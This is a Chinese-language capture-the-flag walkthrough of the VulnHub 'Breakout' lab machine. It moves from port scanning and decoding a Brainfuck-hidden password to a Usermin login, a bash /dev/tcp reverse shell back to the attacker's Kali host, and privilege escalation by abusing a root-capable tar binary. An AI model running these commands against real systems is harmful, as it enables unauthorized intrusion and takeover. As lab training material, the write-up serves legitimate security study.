kali IP:192.168.43.118
目标IP:192.168.43.12
sudo nmap 192.168.43.1/24
--> 192.168.43.12
sudo nmap -sC -sV -p- 192.168.43.12
--> 开放端口:
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
MAC Address: 08:00:27:96:14:AD (Oracle VirtualBox virtual NIC)
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-23T01:50:33
|_ start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
浏览器访问80端口:
--> 有一段注释代码:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
使用brainfuck解密(https://ctf.bugku.com/tool/brainfuck )
-- > .2uqPEfj3D<P'a-3
smbmap -H 192.168.43.12
--> 无有用信息
enum4linux -a 192.168.43.12
--> S-1-22-1-1000 Unix Usercyber (Local User)
浏览器访问10000端口 -> https -> Webmin登录界面 -> 用户名:cyber 密码:.2uqPEfj3D<P'a-3 ->登录失败
浏览器访问20000端口 -> https -> Webmin登录界面 -> 用户名:cyber 密码:.2uqPEfj3D<P'a-3 ->登录成功
--> Usermin ->Tools -> File Manager -> user.txt -> 3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
反弹shell:
kali: nc -lvvp 1234
Webmin下面有个终端窗口 -> bash -i >& /dev/tcp/192.168.43.118/1234 0>&1
反弹成功
切换完整交互shell:
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL + Z
stty -a
stty raw -echo;fg
stty rows xx columns xxx
权限提升:
ls -all
--> 有一个tar是root权限的
尝试执行:./tar
--> 压缩包程序,需要对文件使用
查找文件 find / name ".*" 2>/dev/null |grep "flag"
find / name ".*" 2>/dev/null |grep "pass"
--> /var/backups/.old_pass.bak 找到了一个隐藏文件,ls -all查看是root权限才能执行
使用tar压缩再解压缩,转为普通用户权限
tar -cxvf 1.tar.gz /var/backups/.old_pass.bak
--> 1.tar.gz 是cyber用户权限的压缩包
tar -zxvf 1.tar.gz
--> var/backups/.old_pass.bak 是普通用户权限的文件
cat var/backups/.old_pass.bak
--> Ts&4&YurgtRX(=~h 尝试作为root密码登录
su
password: Ts&4&YurgtRX(=~h
--> 登陆成功
root根目录下有一个rOOt.txt
cat rOOt.txt
--> 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation}
原文始发于微信公众号(北京路劲科技有限公司):靶机练习No.6 VulnHub靶场Breakout
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论